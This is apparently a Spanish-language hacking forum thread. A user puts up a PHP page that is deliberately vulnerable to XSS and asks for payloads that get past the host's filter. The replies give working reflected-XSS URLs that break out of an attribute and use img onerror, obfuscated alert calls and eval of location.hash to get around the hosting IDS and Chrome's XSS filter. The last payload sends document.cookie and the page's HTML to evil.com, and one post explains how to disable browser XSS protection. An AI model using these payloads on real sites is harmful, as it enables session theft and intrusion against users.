Hola es posible que tu hosting te proteja de ataques XSS porque estoy utilizando hostinger.es y me hice una pagina de prueba en plan:
Hola <?php echo $_GET['name'];?>
Pero al poner pagina?hola = <script>alert()</script>
Me muestra que la pagina no existe error 404.
También probé métodos de https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet pero no consigo con ninguno.
El background:url(javscript... todavía funciona?
Saludos
Es posible pero antes asegurate de otras cosas.
CitarPero al poner pagina?hola = <script>alert()</script>
¿ Pones
pagina?hola= o
pagina.php?hola= ? Si es el primer caso, tienes alguna regla tipo
mod_rewrite que haga de router ?
También ten en cuenta que algunos navegadores (safari,chrome,ie...) tienen filtros anti-xss por defecto. Tienes que mandar un
header() para que los desactiven.
header('X-XSS-Protection: 0');Saludos
He desactivado el filtro de chrome antes usaba firefox con tor o ie con el filtro desactivado.
Mi pagina es pagina.php?name=...
He cambiado el archivo un poco:
Hola <a href=" <?php echo $_GET['name'];?> " /><?php echo $_GET['name'];?></a>
Luego con esto http://pruebasdephp.hol.es/XSS_test.php?name=javascript:location.href=%27http://www.google.es%27
Consigo redireccionar hacia google. Luego intente con 'http://www.google.es?a='+document.cookie" pero no me muestra el +
La alerta tampoco consigo poner la
usa htmlentities
http://www.w3schools.com/php/func_string_htmlentities.asp
<?php echo htmlentities($_GET['name']);?>
Lo que quiero no es defender me si no lo contrario. Voy a poner la pagina si alguien consigue hacer una alerta o cookies o cualquier otra cosa con XSS y luego si me puede ensenar como lo ha hecho ;D
http://pruebasdephp.hol.es/XSS_test.php
Saludos
a en firefox y opera me funciona:
Citarhttp://pruebasdephp.hol.es/XSS_test.php?name=%3C/a%3E%3Cimg%20src=/%20onerror=%22location.href=%27http://www.google.es%27%22%3E%3C/img%3E
lo que vendria a significar:
http://pruebasdephp.hol.es/XSS_test.php?name=</a><img src=/ onerror="location.href='http://www.google.es'"></img>no recuerdo muy bien pero los xss de chrome son diferentes
Buscas algo así?
http://pruebasdephp.hol.es/XSS_test.php?name=x"><img onerror="a=alert;a('XSS by WHK')" src="x (http://pruebasdephp.hol.es/XSS_test.php?name=x"><img%20onerror="a=alert;a('XSS%20by%20WHK')"%20src="x)
El ids (sistema de detección de intrusos) de hol.es es bastante malo, usan listas negras bastantes pobres, puedes bbypasear los filtros de muchas maneras. Bypasear el filtro de google chrome es un poco mas difícil pero también tiene sus formas de hacerlo.
Edito:
Aqui tienes un XSS que bypasea el filtro de hol.es y el de Google Chrome 38.0 y funciona en todos los navegadores a la fecha con o sin filtro:
http://pruebasdephp.hol.es/XSS_test.php?name=x"><img src="x" onerror="a=alert;a(0911) (http://pruebasdephp.hol.es/XSS_test.php?name=x"><img%20src="x"%20onerror="a=alert;a(0911))
Realmente crees que los filtros son suficientes para detener un ataque?, yo creo que no.
Acá hay otro XSS compatible con hol.es y google chrome:
http://pruebasdephp.hol.es/XSS_test.php?name=x"><img src="x" onerror=";a=alert;a(location.hash.substr(1))#XSS by WHK (http://pruebasdephp.hol.es/XSS_test.php?name=x"><img%20src="x"%20onerror=";a=alert;a(location.hash.substr(1))#XSS%20by%20WHK)
Acá un XSS mas peligroso compatible con todos los navegadores con filtros anti xss y hosteado en hol.es:
http://pruebasdephp.hol.es/XSS_test.php?name=x"><img src="x" onerror=";a=eval;a(location.hash.substr(1))#document.location="http://evil.com/?recibe=" + escape(document.cookie) + ': ' + escape(document.body.innerHTML); (http://pruebasdephp.hol.es/XSS_test.php?name=x"><img%20src="x"%20onerror=";a=eval;a(location.hash.substr(1))#document.location="http://evil.com/?recibe="%20+%20escape(document.cookie)%20+%20':%20'%20+%20escape(document.body.innerHTML);)
Saludos.